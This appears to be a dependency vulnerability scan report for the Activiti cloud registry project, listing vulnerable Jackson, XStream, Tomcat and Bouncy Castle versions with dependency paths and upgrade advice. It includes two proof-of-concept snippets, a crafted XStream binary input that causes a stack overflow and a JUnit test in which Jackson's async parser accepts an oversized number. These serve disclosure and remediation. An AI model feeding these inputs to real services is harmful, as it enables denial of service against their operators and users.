  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 com.netflix.eureka:eureka-client@2.0.5 com.fasterxml.jackson.core:jackson-databind@2.20.2 com.fasterxml.jackson.core:jackson-core@2.20.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 org.springframework.boot:spring-boot-jackson2@4.0.2 com.fasterxml.jackson.core:jackson-databind@2.20.2 com.fasterxml.jackson.core:jackson-core@2.20.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.fasterxml.jackson.dataformat:jackson-dataformat-xml@2.20.2 com.fasterxml.jackson.core:jackson-core@2.20.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.fasterxml.jackson.core:jackson-core@2.20.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.fasterxml.jackson.core:jackson-core@2.20.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.fasterxml.jackson.dataformat:jackson-dataformat-xml@2.20.2 com.fasterxml.jackson.core:jackson-databind@2.20.2 com.fasterxml.jackson.core:jackson-core@2.20.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.fasterxml.jackson.core:jackson-databind@2.20.2 com.fasterxml.jackson.core:jackson-core@2.20.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.fasterxml.jackson.core:jackson-databind@2.20.2 com.fasterxml.jackson.core:jackson-core@2.20.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.amazonaws:aws-java-sdk-core@1.11.277 com.fasterxml.jackson.core:jackson-databind@2.20.2 com.fasterxml.jackson.core:jackson-core@2.20.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.amazonaws:aws-java-sdk-core@1.11.277 com.fasterxml.jackson.dataformat:jackson-dataformat-cbor@2.6.7 com.fasterxml.jackson.core:jackson-core@2.20.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.amazonaws:aws-java-sdk-autoscaling@1.11.277 com.amazonaws:aws-java-sdk-core@1.11.277 com.fasterxml.jackson.core:jackson-databind@2.20.2 com.fasterxml.jackson.core:jackson-core@2.20.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.amazonaws:aws-java-sdk-ec2@1.11.277 com.amazonaws:aws-java-sdk-core@1.11.277 com.fasterxml.jackson.core:jackson-databind@2.20.2 com.fasterxml.jackson.core:jackson-core@2.20.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.amazonaws:aws-java-sdk-route53@1.11.277 com.amazonaws:aws-java-sdk-core@1.11.277 com.fasterxml.jackson.core:jackson-databind@2.20.2 com.fasterxml.jackson.core:jackson-core@2.20.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.amazonaws:aws-java-sdk-sts@1.11.277 com.amazonaws:aws-java-sdk-core@1.11.277 com.fasterxml.jackson.core:jackson-databind@2.20.2 com.fasterxml.jackson.core:jackson-core@2.20.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.amazonaws:aws-java-sdk-autoscaling@1.11.277 com.amazonaws:jmespath-java@1.11.277 com.fasterxml.jackson.core:jackson-databind@2.20.2 com.fasterxml.jackson.core:jackson-core@2.20.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.amazonaws:aws-java-sdk-ec2@1.11.277 com.amazonaws:jmespath-java@1.11.277 com.fasterxml.jackson.core:jackson-databind@2.20.2 com.fasterxml.jackson.core:jackson-core@2.20.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.amazonaws:aws-java-sdk-route53@1.11.277 com.amazonaws:jmespath-java@1.11.277 com.fasterxml.jackson.core:jackson-databind@2.20.2 com.fasterxml.jackson.core:jackson-core@2.20.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.amazonaws:aws-java-sdk-sts@1.11.277 com.amazonaws:jmespath-java@1.11.277 com.fasterxml.jackson.core:jackson-databind@2.20.2 com.fasterxml.jackson.core:jackson-core@2.20.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.amazonaws:aws-java-sdk-autoscaling@1.11.277 com.amazonaws:aws-java-sdk-core@1.11.277 com.fasterxml.jackson.dataformat:jackson-dataformat-cbor@2.6.7 com.fasterxml.jackson.core:jackson-core@2.20.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.amazonaws:aws-java-sdk-ec2@1.11.277 com.amazonaws:aws-java-sdk-core@1.11.277 com.fasterxml.jackson.dataformat:jackson-dataformat-cbor@2.6.7 com.fasterxml.jackson.core:jackson-core@2.20.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.amazonaws:aws-java-sdk-route53@1.11.277 com.amazonaws:aws-java-sdk-core@1.11.277 com.fasterxml.jackson.dataformat:jackson-dataformat-cbor@2.6.7 com.fasterxml.jackson.core:jackson-core@2.20.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.amazonaws:aws-java-sdk-sts@1.11.277 com.amazonaws:aws-java-sdk-core@1.11.277 com.fasterxml.jackson.dataformat:jackson-dataformat-cbor@2.6.7 com.fasterxml.jackson.core:jackson-core@2.20.2

Overview

com.fasterxml.jackson.core:jackson-core is a Core Jackson abstractions, basic JSON streaming API implementation

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling in the enforcement of document length constraints in blocking, async, and DataInput parser processes. An attacker can cause excessive resource consumption by submitting oversized JSON documents that bypass configured size limits.

Remediation

Upgrade com.fasterxml.jackson.core:jackson-core to version 2.18.7, 2.21.2 or higher.

References

Allocation of Resources Without Limits or Throttling vulnerability report

high severity

Deserialization of Untrusted Data

  • Vulnerable module: com.thoughtworks.xstream:xstream
  • Introduced through: org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.

Overview

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Deserialization of Untrusted Data due to a manipulated binary input stream. An attacker can terminate the application with a stack overflow error resulting in a denial of service by manipulating the processed input stream when configured to use the BinaryStreamDriver.

Workaround

This vulnerability can be mitigated by catching the StackOverflowError in the client code calling XStream.

PoC

Prepare the manipulated data and provide it as input for a XStream instance using the BinaryDriver:

final byte[] byteArray = new byte[36000];
for (int i = 0; i < byteArray.length / 4; i++) {
      byteArray[i * 4] = 10;
      byteArray[i * 4 + 1] = -127;
      byteArray[i * 4 + 2] = 0;
      byteArray[i * 4 + 3] = 0;
}

XStream xstream = new XStream(new BinaryStreamDriver());
xstream.fromXML(new ByteArrayInputStream(byteArray));

As soon as the data gets unmarshalled, the endless recursion is entered and the executing thread is aborted with a stack overflow error.

Details

Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like Remote Method Invocation (RMI), Java Management Extension (JMX), Java Messaging System (JMS), Action Message Format (AMF), Java Server Faces (JSF) ViewState, etc.

Deserialization of untrusted data (CWE-502) is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, thus allowing the attacker to control the state or the flow of the execution.

Remediation

Upgrade com.thoughtworks.xstream:xstream to version 1.4.21 or higher.

References

Deserialization of Untrusted Data vulnerability report

high severity
new

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 org.apache.tomcat.embed:tomcat-embed-core@11.0.21
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 org.apache.tomcat.embed:tomcat-embed-core@11.0.21
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 org.apache.tomcat.embed:tomcat-embed-websocket@11.0.21 org.apache.tomcat.embed:tomcat-embed-core@11.0.21
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 org.apache.tomcat.embed:tomcat-embed-core@11.0.21

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via the WebDAV LOCK and PROPFIND XML request bodies. An attacker can cause excessive resource consumption by sending specially crafted requests that trigger unbounded reads.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 9.0.118, 10.1.55, 11.0.22 or higher.

References

Allocation of Resources Without Limits or Throttling vulnerability report

high severity
new

Use of a Broken or Risky Cryptographic Algorithm

  • Vulnerable module: org.bouncycastle:bcprov-jdk18on
  • Introduced through: org.springframework.cloud:spring-cloud-starter-config@5.0.3 and org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.bouncycastle:bcprov-jdk18on@1.81
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.bouncycastle:bcprov-jdk18on@1.81
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.bouncycastle:bcprov-jdk18on@1.81
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.bouncycastle:bcprov-jdk18on@1.81

Overview

Affected versions of this package are vulnerable to Use of a Broken or Risky Cryptographic Algorithm due to the generateCTR process in G3413CTRBlockCipher. An attacker can recover relationships between encrypted plaintext blocks by driving the cipher past its counter range and causing the counter to wrap, which makes the stream repeat and produces identical ciphertext for different blocks. This breaks the confidentiality of data protected with G3413CTRBlockCipher and can expose plaintext patterns or allow plaintext recovery when the same key and IV are reused across enough blocks.

Remediation

Upgrade org.bouncycastle:bcprov-jdk18on to version 1.84 or higher.

References

Use of a Broken or Risky Cryptographic Algorithm vulnerability report

high severity

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: tools.jackson.core:jackson-core
  • Introduced through: org.springframework.cloud:spring-cloud-starter-config@5.0.3, org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 and others

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 tools.jackson.core:jackson-databind@3.0.4 tools.jackson.core:jackson-core@3.0.4
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 tools.jackson.core:jackson-databind@3.0.4 tools.jackson.core:jackson-core@3.0.4
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 org.springframework.boot:spring-boot-jackson@4.1.0-RC1 tools.jackson.core:jackson-databind@3.0.4 tools.jackson.core:jackson-core@3.0.4
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 org.springframework.boot:spring-boot-jackson@4.1.0-RC1 tools.jackson.core:jackson-databind@3.0.4 tools.jackson.core:jackson-core@3.0.4

Overview

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling in which the non-blocking async JSON parser can be made to bypass the maxNumberLength constraint (default: 1000 characters) defined in StreamReadConstraints. An attacker can cause excessive memory allocation and CPU exhaustion by submitting JSON documents containing extremely long numeric values through the asynchronous parser interface.

PoC

The following JUnit 5 test demonstrates the vulnerability. It shows that the async parser accepts a 5,000-digit number, whereas the limit should be 1,000.

package tools.jackson.core.unittest.dos;

import java.nio.charset.StandardCharsets;

import org.junit.jupiter.api.Test;

import tools.jackson.core.*;
import tools.jackson.core.exc.StreamConstraintsException;
import tools.jackson.core.json.JsonFactory;
import tools.jackson.core.json.async.NonBlockingByteArrayJsonParser;

import static org.junit.jupiter.api.Assertions.*;

/**
 * POC: Number Length Constraint Bypass in Non-Blocking (Async) JSON Parsers
 *
 * Authors: sprabhav7, rohan-repos
 * 
 * maxNumberLength default = 1000 characters (digits).
 * A number with more than 1000 digits should be rejected by any parser.
 *
 * BUG: The async parser never calls resetInt()/resetFloat() which is where
 * validateIntegerLength()/validateFPLength() lives. Instead it calls
 * _valueComplete() which skips all number length validation.
 *
 * CWE-770: Allocation of Resources Without Limits or Throttling
 */
class AsyncParserNumberLengthBypassTest {

    private static final int MAX_NUMBER_LENGTH = 1000;
    private static final int TEST_NUMBER_LENGTH = 5000;

    private final JsonFactory factory = new JsonFactory();

    // CONTROL: Sync parser correctly rejects a number exceeding maxNumberLength
    @Test
    void syncParserRejectsLongNumber() throws Exception {
        byte[] payload = buildPayloadWithLongInteger(TEST_NUMBER_LENGTH);
        
        // Output to console
        System.out.println("[SYNC] Parsing " + TEST_NUMBER_LENGTH + "-digit number (limit: " + MAX_NUMBER_LENGTH + ")");
        try {
            try (JsonParser p = factory.createParser(ObjectReadContext.empty(), payload)) {
                while (p.nextToken() != null) {
                    if (p.currentToken() == JsonToken.VALUE_NUMBER_INT) {
                        System.out.println("[SYNC] Accepted number with " + p.getText().length() + " digits — UNEXPECTED");
                    }
                }
            }
            fail("Sync parser must reject a " + TEST_NUMBER_LENGTH + "-digit number");
        } catch (StreamConstraintsException e) {
            System.out.println("[SYNC] Rejected with StreamConstraintsException: " + e.getMessage());
        }
    }

    // VULNERABILITY: Async parser accepts the SAME number that sync rejects
    @Test
    void asyncParserAcceptsLongNumber() throws Exception {
        byte[] payload = buildPayloadWithLongInteger(TEST_NUMBER_LENGTH);

        NonBlockingByteArrayJsonParser p =
            (NonBlockingByteArrayJsonParser) factory.createNonBlockingByteArrayParser(ObjectReadContext.empty());
        p.feedInput(payload, 0, payload.length);
        p.endOfInput();

        boolean foundNumber = false;
        try {
            while (p.nextToken() != null) {
                if (p.currentToken() == JsonToken.VALUE_NUMBER_INT) {
                    foundNumber = true;
                    String numberText = p.getText();
                    assertEquals(TEST_NUMBER_LENGTH, numberText.length(),
                        "Async parser silently accepted all " + TEST_NUMBER_LENGTH + " digits");
                }
            }
            // Output to console
            System.out.println("[ASYNC INT] Accepted number with " + TEST_NUMBER_LENGTH + " digits — BUG CONFIRMED");
            assertTrue(foundNumber, "Parser should have produced a VALUE_NUMBER_INT token");
        } catch (StreamConstraintsException e) {
            fail("Bug is fixed — async parser now correctly rejects long numbers: " + e.getMessage());
        }
        p.close();
    }

    private byte[] buildPayloadWithLongInteger(int numDigits) {
        StringBuilder sb = new StringBuilder(numDigits + 10);
        sb.append("{\"v\":");
        for (int i = 0; i < numDigits; i++) {
            sb.append((char) ('1' + (i % 9)));
        }
        sb.append('}');
        return sb.toString().getBytes(StandardCharsets.UTF_8);
    }
}

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade tools.jackson.core:jackson-core to version 3.1.0 or higher.

References

Allocation of Resources Without Limits or Throttling vulnerability report

high severity

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: tools.jackson.core:jackson-core
  • Introduced through: org.springframework.cloud:spring-cloud-starter-config@5.0.3, org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 and others

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 tools.jackson.core:jackson-databind@3.0.4 tools.jackson.core:jackson-core@3.0.4
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 tools.jackson.core:jackson-databind@3.0.4 tools.jackson.core:jackson-core@3.0.4
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 org.springframework.boot:spring-boot-jackson@4.1.0-RC1 tools.jackson.core:jackson-databind@3.0.4 tools.jackson.core:jackson-core@3.0.4
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 org.springframework.boot:spring-boot-jackson@4.1.0-RC1 tools.jackson.core:jackson-databind@3.0.4 tools.jackson.core:jackson-core@3.0.4

Overview

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling in the enforcement of document length constraints in blocking, async, and DataInput parser processes. An attacker can cause excessive resource consumption by submitting oversized JSON documents that bypass configured size limits.

Remediation

Upgrade tools.jackson.core:jackson-core to version 3.1.1 or higher.

References

Allocation of Resources Without Limits or Throttling vulnerability report

high severity

Deserialization of Untrusted Data

  • Vulnerable module: com.thoughtworks.xstream:xstream
  • Introduced through: org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
